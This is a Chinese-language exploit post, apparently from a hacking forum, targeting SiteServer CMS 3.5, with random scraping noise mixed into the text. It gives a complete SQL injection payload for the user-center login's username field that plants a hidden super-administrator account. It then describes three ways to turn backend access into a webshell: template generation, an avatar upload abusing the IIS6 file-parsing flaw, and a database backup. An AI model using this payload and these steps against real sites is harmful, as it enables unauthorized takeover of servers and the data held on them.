经测试秒杀最新的3.5版" A6 Y F$ L/ X% \. H5 `7 M: _# _
stieserver官网:www.siteserver.cn
* _- Y* I, J- `EXP:, u8 A8 _0 w5 l# V6 Z' D7 J9 c0 k4 V
直接访问UserCenter/login.aspx
; W5 w- ~1 x3 D; A! R" ]用户名处输入:
! V7 B, ?0 r! t; c, a
9 w4 j* r) s9 j9 f3 P6 X1 D123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
) L- @8 ^& X( \/ F. I5 ?4 g+ P密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
# i: F6 U# b$ Z3 n0 F0 r; j之后再访问后台SiteServer/login.aspx用插入的用户登陆( j _4 N2 z# R! p
后台拿webshell的三种方法:
, q2 |4 q2 F" R6 U一、
' j) G- _+ [- E% V5 n3 {8 F0 W1 D$ G站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
7 D5 S1 `& G+ r" i' u9 h二、' G! B9 x0 v, o
成员权限-》添加用户-》用户名为:1.asp
5 ]- T. ^0 _9 Y7 u" u3 i( bhttp://127.0.0.1/usercenter/- b5 \% k9 [$ x: s
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell" |, `9 Z$ P( V( G
(ps:后台添加用户时不会验证是否含有非法字符)$ P% B% f" j: z- d0 |( N0 j
三、
+ H! ?9 C4 L# _3 a7 t" N& m+ E系统工具-》实用工具-》机器参数查看
) I# j" V% f$ m% D可以看到数据库类型、名称,WEB路径
- X% G" Y/ q* P4 e" _6 l' e系统工具-》数据库工具-》SQL语句查询
: u6 a' p' G" N4 d这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |